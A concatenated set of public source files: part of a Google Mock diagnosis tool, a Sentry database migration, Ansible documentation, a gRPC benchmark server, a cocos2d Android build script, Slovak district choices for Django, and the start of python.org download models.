clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'error: no member named \'(?P<method>\w+)\' in '
r'\'testing::internal::MockSpec<.*>\'')
diagnosis = """
The closing parenthesis of ON_CALL or EXPECT_CALL should be *before*
".%(method)s". For example, you should write:
EXPECT_CALL(my_mock, Foo(_)).%(method)s(...);
instead of:
EXPECT_CALL(my_mock, Foo(_).%(method)s(...));"""
return _GenericDiagnoser('WPP', 'Wrong Parenthesis Position',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
_DIAGNOSERS = [
_IncompleteByReferenceArgumentDiagnoser,
_MockObjectPointerDiagnoser,
_NeedToReturnNothingDiagnoser,
_NeedToReturnReferenceDiagnoser,
_NeedToReturnSomethingDiagnoser,
_NeedToUseReturnNullDiagnoser,
_NeedToUseSymbolDiagnoser,
_OverloadedFunctionActionDiagnoser,
_OverloadedFunctionMatcherDiagnoser,
_OverloadedMethodActionDiagnoser,
_TypeInTemplatedBaseDiagnoser,
_WrongMockMethodMacroDiagnoser,
_WrongParenPositionDiagnoser,
]
def Diagnose(msg):
"""Generates all possible diagnoses given the compiler error message."""
msg = re.sub(r'\x1b\[[^m]*m', '', msg) # Strips all color formatting.
# Assuming the string is using the UTF-8 encoding, replaces the left and
# the right single quote characters with apostrophes.
msg = re.sub(r'(\xe2\x80\x98|\xe2\x80\x99)', "'", msg)
diagnoses = []
for diagnoser in _DIAGNOSERS:
for diag in diagnoser(msg):
diagnosis = '[%s - %s]\n%s' % diag
if not diagnosis in diagnoses:
diagnoses.append(diagnosis)
return diagnoses
def main():
print ('Google Mock Doctor v%s - '
'diagnoses problems in code using Google Mock.' % _VERSION)
if sys.stdin.isatty():
print ('Please copy and paste the compiler errors here. Press c-D when '
'you are done:')
else:
print 'Waiting for compiler errors on stdin . . .'
msg = sys.stdin.read().strip()
diagnoses = Diagnose(msg)
count = len(diagnoses)
if not count:
print ("""
Your compiler complained:
8<------------------------------------------------------------
%s
------------------------------------------------------------>8
Uh-oh, I'm not smart enough to figure out what the problem is. :-(
However...
If you send your source code and the compiler's error messages to
%s, you can be helped and I can get smarter --
win-win for us!""" % (msg, _EMAIL))
else:
print '------------------------------------------------------------'
print 'Your code appears to have the following',
if count > 1:
print '%s diseases:' % (count,)
else:
print 'disease:'
i = 0
for d in diagnoses:
i += 1
if count > 1:
print '\n#%s:' % (i,)
print d
print ("""
How did I do? If you think I'm wrong or unhelpful, please send your
source code and the compiler's error messages to %s.
Then you can be helped and I can get smarter -- I promise I won't be upset!""" %
_EMAIL)
if __name__ == '__main__':
main()
|
caot/intellij-community | refs/heads/master | python/testData/quickFixes/PyMakeFunctionFromMethodQuickFixTest/usageSelf_after.py | 75 | def method2():
print 1
class A():
def method(self):
method2()
|
1tush/sentry | refs/heads/master | src/sentry/migrations/0042_auto__add_projectcountbyminute__add_unique_projectcountbyminute_projec.py | 36 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProjectCountByMinute'
db.create_table('sentry_projectcountbyminute', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'], null=True)),
('date', self.gf('django.db.models.fields.DateTimeField')()),
('times_seen', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
('time_spent_total', self.gf('django.db.models.fields.FloatField')(default=0)),
('time_spent_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal('sentry', ['ProjectCountByMinute'])
# Adding unique constraint on 'ProjectCountByMinute', fields ['project', 'date']
db.create_unique('sentry_projectcountbyminute', ['project_id', 'date'])
def backwards(self, orm):
# Removing unique constraint on 'ProjectCountByMinute', fields ['project', 'date']
db.delete_unique('sentry_projectcountbyminute', ['project_id', 'date'])
# Deleting model 'ProjectCountByMinute'
db.delete_table('sentry_projectcountbyminute')
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_project_set'", 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
|
tersmitten/ansible | refs/heads/devel | lib/ansible/plugins/doc_fragments/aruba.py | 44 | # -*- coding: utf-8 -*-
# Copyright: (c) 2017, James Mighion <@jmighion>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = r'''
options:
provider:
description:
- A dict object containing connection details.
suboptions:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
device over the specified transport. The value of host is used as
the destination address for the transport.
type: str
required: true
port:
description:
- Specifies the port to use when building the connection to the remote.
device.
type: int
default: 22
username:
description:
- Configures the username to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
type: str
password:
description:
- Specifies the password to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
type: str
timeout:
description:
- Specifies the timeout in seconds for communicating with the network device
for either connecting or sending commands. If the timeout is
exceeded before the operation is completed, the module will error.
type: int
default: 10
ssh_keyfile:
description:
- Specifies the SSH key to use to authenticate the connection to
the remote device. This value is the path to the
key used to authenticate the SSH session. If the value is not specified
in the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE)
will be used instead.
type: path
'''
|
royalharsh/grpc | refs/heads/master | src/python/grpcio_tests/tests/qps/benchmark_server.py | 23 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import services_pb2
class BenchmarkServer(services_pb2.BenchmarkServiceServicer):
"""Synchronous Server implementation for the Benchmark service."""
def UnaryCall(self, request, context):
payload = messages_pb2.Payload(body='\0' * request.response_size)
return messages_pb2.SimpleResponse(payload=payload)
def StreamingCall(self, request_iterator, context):
for request in request_iterator:
payload = messages_pb2.Payload(body='\0' * request.response_size)
yield messages_pb2.SimpleResponse(payload=payload)
class GenericBenchmarkServer(services_pb2.BenchmarkServiceServicer):
"""Generic Server implementation for the Benchmark service."""
def __init__(self, resp_size):
self._response = '\0' * resp_size
def UnaryCall(self, request, context):
return self._response
def StreamingCall(self, request_iterator, context):
for request in request_iterator:
yield self._response
|
cocos2d/cocos2d-x-samples | refs/heads/v3 | samples/SwiftTetris/cocos2d/plugin/tools/android-build.py | 240 | #!/usr/bin/python
# android-build.py
# Build android samples
import sys
import os, os.path
import shutil
from optparse import OptionParser
CPP_SAMPLES = ["HelloPlugins"]
ALL_SAMPLES = CPP_SAMPLES
def check_environment_variables():
''' Checking the environment NDK_ROOT, which will be used for building
'''
try:
NDK_ROOT = os.environ['NDK_ROOT']
except Exception:
print "NDK_ROOT not defined. Please define NDK_ROOT in your environment"
sys.exit(1)
return NDK_ROOT
def select_toolchain_version():
'''Because ndk-r8e uses gcc4.6 as default. gcc4.6 doesn't support c++11. So we should select gcc4.7 when
using ndk-r8e. But gcc4.7 is removed in ndk-r9, so we should determine whether gcc4.7 exist.
Conclution:
ndk-r8e -> use gcc4.7
ndk-r9 -> use gcc4.8
'''
ndk_root = check_environment_variables()
if os.path.isdir(os.path.join(ndk_root,"toolchains/arm-linux-androideabi-4.8")):
os.environ['NDK_TOOLCHAIN_VERSION'] = '4.8'
print "The Selected NDK toolchain version was 4.8 !"
elif os.path.isdir(os.path.join(ndk_root,"toolchains/arm-linux-androideabi-4.7")):
os.environ['NDK_TOOLCHAIN_VERSION'] = '4.7'
print "The Selected NDK toolchain version was 4.7 !"
else:
print "Couldn't find the gcc toolchain."
exit(1)
def caculate_built_samples(args):
''' Compute the sampels to be built
'cpp' for short of all cpp samples
'jsb' for short of all javascript samples
'''
if 'all' in args:
return ALL_SAMPLES
if 'jsb' in args:
return JSB_SAMPLES
if 'cpp' in args:
return CPP_SAMPLES
targets = []
targets += args
# remove duplicate elements, for example
# python android-build.py cpp hellocpp
targets = set(targets)
return list(targets)
def do_build(plugin_root, cocos_root, ndk_root, app_android_root, ndk_build_param):
ndk_path = os.path.join(ndk_root, "ndk-build")
# windows should use ";" to seperate module paths
platform = sys.platform
if platform == 'win32':
ndk_module_path = 'NDK_MODULE_PATH=%s/publish;%s;%s/external;%s/cocos' % (plugin_root, cocos_root, cocos_root, cocos_root)
else:
ndk_module_path = 'NDK_MODULE_PATH=%s/publish:%s:%s/external:%s/cocos' % (plugin_root, cocos_root, cocos_root, cocos_root)
if ndk_build_param == None:
command = '%s -C %s %s' % (ndk_path, app_android_root, ndk_module_path)
else:
command = '%s -C %s %s %s' % (ndk_path, app_android_root, ndk_build_param, ndk_module_path)
os.system(command)
def copy_files(src, dst):
for item in os.listdir(src):
path = os.path.join(src, item)
# Android can not package the file that ends with ".gz"
if not item.startswith('.') and not item.endswith('.gz') and os.path.isfile(path):
shutil.copy(path, dst)
if os.path.isdir(path):
new_dst = os.path.join(dst, item)
if not os.path.exists(new_dst):
os.mkdir(new_dst)
copy_files(path, new_dst)
def copy_resources(target, app_android_root, plugin_root):
# remove app_android_root/assets if it exists
assets_dir = os.path.join(app_android_root, "assets")
if os.path.isdir(assets_dir):
shutil.rmtree(assets_dir)
# copy resources(cpp samples and lua samples)
os.mkdir(assets_dir)
resources_dir = os.path.join(app_android_root, "../Resources")
if os.path.isdir(resources_dir):
copy_files(resources_dir, assets_dir)
# jsb samples should copy javascript files and resources(shared with cocos2d-html5)
# if target in JSB_SAMPLES:
# resources_dir = os.path.join(app_android_root, "../../../../cocos/scripting/javascript/script")
# copy_files(resources_dir, assets_dir)
# resources_dir = os.path.join(plugin_root, "jsbindings/js")
# copy_files(resources_dir, assets_dir)
# copy plugin resources to the assets
plugins_dir = os.path.join(plugin_root, "publish" + os.path.sep + "plugins")
for item in os.listdir(plugins_dir):
src = os.path.join(plugins_dir, item + os.path.sep + "android" + os.path.sep + "ForAssets")
if os.path.isdir(src):
copy_files(src, assets_dir)
def copy_clibs(app_android_root, plugin_root):
target_cpath = os.path.join(app_android_root, "libs")
plugins_dir = os.path.join(plugin_root, "publish" + os.path.sep + "plugins")
for item in os.listdir(plugins_dir):
src = os.path.join(plugins_dir, item + os.path.sep + "android" + os.path.sep + "CLibs")
if os.path.isdir(src):
if not os.path.exists(target_cpath):
os.mkdir(target_cpath)
copy_files(src, target_cpath)
def build_samples(target,ndk_build_param):
ndk_root = check_environment_variables()
select_toolchain_version()
build_targets = caculate_built_samples(target)
current_dir = os.path.dirname(os.path.realpath(__file__))
cocos_root = os.path.join(current_dir, "../../")
plugin_root = os.path.join(current_dir, "..")
app_android_root = ''
for target in build_targets:
app_android_root = os.path.join(plugin_root, "samples" + os.path.sep + target + os.path.sep + "proj.android")
copy_resources(target, app_android_root, plugin_root)
do_build(plugin_root, cocos_root, ndk_root, app_android_root, ndk_build_param)
copy_clibs(app_android_root, plugin_root)
# -------------- main --------------
if __name__ == '__main__':
usage = "usage: %prog all"
#parse the params
parser = OptionParser(usage=usage)
parser.add_option("-n", "--ndk", dest="ndk_build_param",
help='parameter for ndk-build')
(opts, args) = parser.parse_args()
if len(args) == 0:
parser.print_help()
else:
build_samples(args, opts.ndk_build_param)
|
softak/webfaction_demo | refs/heads/master | vendor-local/lib/python/django/contrib/localflavor/sk/sk_districts.py | 543 | """
Slovak districts according to http://sk.wikipedia.org/wiki/Administrat%C3%ADvne_%C4%8Dlenenie_Slovenska
"""
from django.utils.translation import ugettext_lazy as _
DISTRICT_CHOICES = (
('BB', _('Banska Bystrica')),
('BS', _('Banska Stiavnica')),
('BJ', _('Bardejov')),
('BN', _('Banovce nad Bebravou')),
('BR', _('Brezno')),
('BA1', _('Bratislava I')),
('BA2', _('Bratislava II')),
('BA3', _('Bratislava III')),
('BA4', _('Bratislava IV')),
('BA5', _('Bratislava V')),
('BY', _('Bytca')),
('CA', _('Cadca')),
('DT', _('Detva')),
('DK', _('Dolny Kubin')),
('DS', _('Dunajska Streda')),
('GA', _('Galanta')),
('GL', _('Gelnica')),
('HC', _('Hlohovec')),
('HE', _('Humenne')),
('IL', _('Ilava')),
('KK', _('Kezmarok')),
('KN', _('Komarno')),
('KE1', _('Kosice I')),
('KE2', _('Kosice II')),
('KE3', _('Kosice III')),
('KE4', _('Kosice IV')),
('KEO', _('Kosice - okolie')),
('KA', _('Krupina')),
('KM', _('Kysucke Nove Mesto')),
('LV', _('Levice')),
('LE', _('Levoca')),
('LM', _('Liptovsky Mikulas')),
('LC', _('Lucenec')),
('MA', _('Malacky')),
('MT', _('Martin')),
('ML', _('Medzilaborce')),
('MI', _('Michalovce')),
('MY', _('Myjava')),
('NO', _('Namestovo')),
('NR', _('Nitra')),
('NM', _('Nove Mesto nad Vahom')),
('NZ', _('Nove Zamky')),
('PE', _('Partizanske')),
('PK', _('Pezinok')),
('PN', _('Piestany')),
('PT', _('Poltar')),
('PP', _('Poprad')),
('PB', _('Povazska Bystrica')),
('PO', _('Presov')),
('PD', _('Prievidza')),
('PU', _('Puchov')),
('RA', _('Revuca')),
('RS', _('Rimavska Sobota')),
('RV', _('Roznava')),
('RK', _('Ruzomberok')),
('SB', _('Sabinov')),
('SC', _('Senec')),
('SE', _('Senica')),
('SI', _('Skalica')),
('SV', _('Snina')),
('SO', _('Sobrance')),
('SN', _('Spisska Nova Ves')),
('SL', _('Stara Lubovna')),
('SP', _('Stropkov')),
('SK', _('Svidnik')),
('SA', _('Sala')),
('TO', _('Topolcany')),
('TV', _('Trebisov')),
('TN', _('Trencin')),
('TT', _('Trnava')),
('TR', _('Turcianske Teplice')),
('TS', _('Tvrdosin')),
('VK', _('Velky Krtis')),
('VT', _('Vranov nad Toplou')),
('ZM', _('Zlate Moravce')),
('ZV', _('Zvolen')),
('ZC', _('Zarnovica')),
('ZH', _('Ziar nad Hronom')),
('ZA', _('Zilina')),
)
|
lepture/pythondotorg | refs/heads/master | downloads/models.py | 6 | from django.core.urlresolvers import reverse
from django.conf import settings
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template.loader import render_to_string
from django.utils import timezone
from markupfield.fields import MarkupField
from boxes.models import Box
from cms.models import ContentManageable, NameSlugModel
from fastly.utils import purge_url
from pages.models import Page
from .managers import ReleaseManager
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'restructuredtext')
class OS(ContentManageable, NameSlugModel):
""" OS for Python release """
class Meta:
verbose_name = 'Operating System'
verbose_name_plural = 'Operating Systems'
ordering = ('name', )
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('download:download_os_list', kwargs={'os_slug': self.slug})
class Release(ContentManageable, NameSlugModel):
"""
A particular version release. Name field should be version number for
example: 3.3.4 or 2.7.6
"""
PYTHON1 = 1
PYTHON2 = 2
PYTHON3 = 3
PYTHON_VERSION_CHOICES = (
(PYTHON3, 'Python 3.x.x'),
(PYTHON2, 'Python 2.x.x'),
(PYTHON1, 'Python 1.x.x'),
)
version = models.IntegerField(default=PYTHON3, choices=PYTHON_VERSION_CHOICES)
is_latest = models.BooleanField(
verbose_name='Is this the latest release?',
default=False,
db_index=True,
help_text="Set this if this should be considered the latest release "
"for the major version. Previous 'latest' versions will "
"automatically have this flag turned off.",
)
is_published = models.BooleanField(
verbose_name='Is Published?',
default=False,
db_index=True,
help_text="Whether or not this should be considered a released/published version",
)
pre_release = models.BooleanField(
verbose_name='Pre-release',
default=False,
